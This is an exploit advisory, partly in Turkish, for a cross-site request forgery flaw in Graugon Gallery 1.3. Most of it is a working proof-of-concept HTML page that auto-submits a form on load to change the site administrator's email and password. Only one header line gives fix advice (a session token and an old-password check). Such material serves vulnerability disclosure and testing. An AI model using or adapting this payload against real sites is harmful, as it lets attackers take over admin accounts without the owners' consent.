< ------------------- header data start ------------------- >

#############################################################

# Application Name : Graugon Gallery 1.3

# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onload=Submit();>
<script>function Submit(){document.system.submit();}</script>
<form method=’post’ action=’http://localhost/gallery/functions.php?id=2’ name=’system’>
<font class=’font1’>Email</font>
<input type=’text’ size=’22’ name=’email’ value=’[email protected]’ class=’edit’>
<font class=’font1’>password</font>
<input type=’text’ size=’22’ name=’password’ value=’123321’ class=’edit’>
<input type=’submit’ value=’Save Settings’ class=’submit’>
</form>

< -- bug code end of -- >